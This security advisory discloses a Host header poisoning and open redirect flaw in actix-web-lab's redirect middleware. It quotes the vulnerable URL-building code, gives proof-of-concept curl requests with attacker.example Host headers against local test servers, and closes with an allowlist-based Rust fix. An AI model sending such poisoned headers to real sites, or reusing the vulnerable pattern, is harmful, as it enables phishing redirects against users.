Uncontrolled external site redirect in actix-web-lab

Description

actix-web-lab's redirect middleware is subject to Host header poisoning and can generate attacker-controlled absolute redirects

Summary

actix-web-lab redirect middleware uses request-derived host information to construct absolute redirect URLs (for example, https://{hostname}{path}). In deployments without strict host allowlisting, an attacker can supply a malicious Host header and poison the Location response header, causing open redirect/phishing behavior.

CVE

Assigned CVE ID: CVE-2025-63762

Details

The issue is in redirect middleware paths that construct absolute URLs from req.connection_info():

    actix-web-lab/src/redirect_to_https.rs (around lines 119-132)

      let host = conn_info.host();

      format!("https://{hostname}{path}")

      format!("https://{hostname}:{port}{path}")

    actix-web-lab/src/redirect_to_www.rs (around lines 30-35)

      format!("{scheme}://www.{host}{path}")

    actix-web-lab/src/redirect_to_non_www.rs (around lines 30-34)

      format!("{scheme}://{host_no_www}{path}")

Because host values come from request connection metadata, untrusted Host input can influence redirect targets when deployment-side host validation is missing.

PoC

Environment used for validation:

    Local minimal Actix apps using actix-web-lab middleware

    RedirectHttps: http://127.0.0.1:18080

    redirect_to_www: http://127.0.0.1:18081

    redirect_to_non_www: http://127.0.0.1:18082

Reproduction (RedirectHttps):

curl.exe -i -s "http://127.0.0.1:18080/test" -H "Host: attacker.example"

Observed response:

HTTP/1.1 307 Temporary Redirect
location: https://attacker.example/test

Additional verification:

curl.exe -i -s "http://127.0.0.1:18080/abc/def" -H "Host: evil.example:9999"

Observed response:

HTTP/1.1 307 Temporary Redirect
location: https://evil.example/abc/def

Reproduction (redirect_to_www):

curl.exe -i -s "http://127.0.0.1:18081/hello" -H "Host: attacker.example"

Observed response:

HTTP/1.1 307 Temporary Redirect
location: http://www.attacker.example/hello

Reproduction (redirect_to_non_www):

curl.exe -i -s "http://127.0.0.1:18082/path" -H "Host: www.attacker.example"

Observed response:

HTTP/1.1 307 Temporary Redirect
location: http://attacker.example/path

Impact

This is a Host header poisoning / open redirect issue. Users can be redirected to attacker-controlled domains, enabling phishing and trust-boundary abuse. Any application using these middleware paths without strict host validation (proxy/app allowlisting) is impacted.

Mitigation
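A defensive pattern for deployments that cannot rely on a proxy to enforce a host allowlist, as an added example and not code from actix-web-lab: the redirect target is built only from a hostname that appears on a configured allowlist, falling back to a canonical host otherwise, so a poisoned Host header never reaches Location. The allowlist, canonical host, function names and the sample header values are assumptions for illustration; in an Actix handler the Host value would come from req.connection_info().host().

```rust
use std::collections::HashSet;

/// Hostname from a Host header value with any port removed. Returns None
/// unless the value is a plain ASCII hostname (letters, digits, '-', '.'),
/// so bracketed IPv6 literals and header junk are rejected up front.
fn hostname_of(host_header: &str) -> Option<String> {
    let raw = host_header.trim();
    let name = raw.rsplit_once(':').map_or(raw, |(h, _)| h);
    let valid = !name.is_empty()
        && name.bytes().all(|b| b.is_ascii_alphanumeric() || b == b'-' || b == b'.');
    valid.then(|| name.to_ascii_lowercase())
}

/// The host a redirect may point at: the request's Host if it is on the
/// allowlist, otherwise the configured canonical host (never the raw header).
fn trusted_host(host_header: &str, allowed: &HashSet<&str>, canonical: &str) -> String {
    hostname_of(host_header)
        .filter(|h| allowed.contains(h.as_str()))
        .unwrap_or_else(|| canonical.to_string())
}

/// Redirects only ever carry an absolute path; anything else collapses to "/".
fn safe_path(path: &str) -> &str {
    if path.starts_with('/') { path } else { "/" }
}

/// Hardened counterpart of the HTTPS-upgrade redirect (assumed function name).
pub fn https_redirect_location(host_header: &str, path: &str, allowed: &HashSet<&str>, canonical: &str) -> String {
    format!("https://{}{}", trusted_host(host_header, allowed, canonical), safe_path(path))
}

/// Hardened counterpart of the add-www redirect (assumed function name).
pub fn www_redirect_location(scheme: &str, host_header: &str, path: &str, allowed: &HashSet<&str>, canonical: &str) -> String {
    let host = trusted_host(host_header, allowed, canonical);
    let bare = host.strip_prefix("www.").unwrap_or(host.as_str());
    format!("{}://www.{}{}", scheme, bare, safe_path(path))
}

fn main() {
    // Constructed allowlist and request values mirroring the advisory's PoC headers.
    let allowed: HashSet<&str> = ["example.com", "www.example.com"].iter().copied().collect();
    println!("{}", https_redirect_location("attacker.example", "/test", &allowed, "example.com"));
    println!("{}", https_redirect_location("evil.example:9999", "/abc/def", &allowed, "example.com"));
    println!("{}", www_redirect_location("http", "attacker.example", "/hello", &allowed, "example.com"));
}
```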
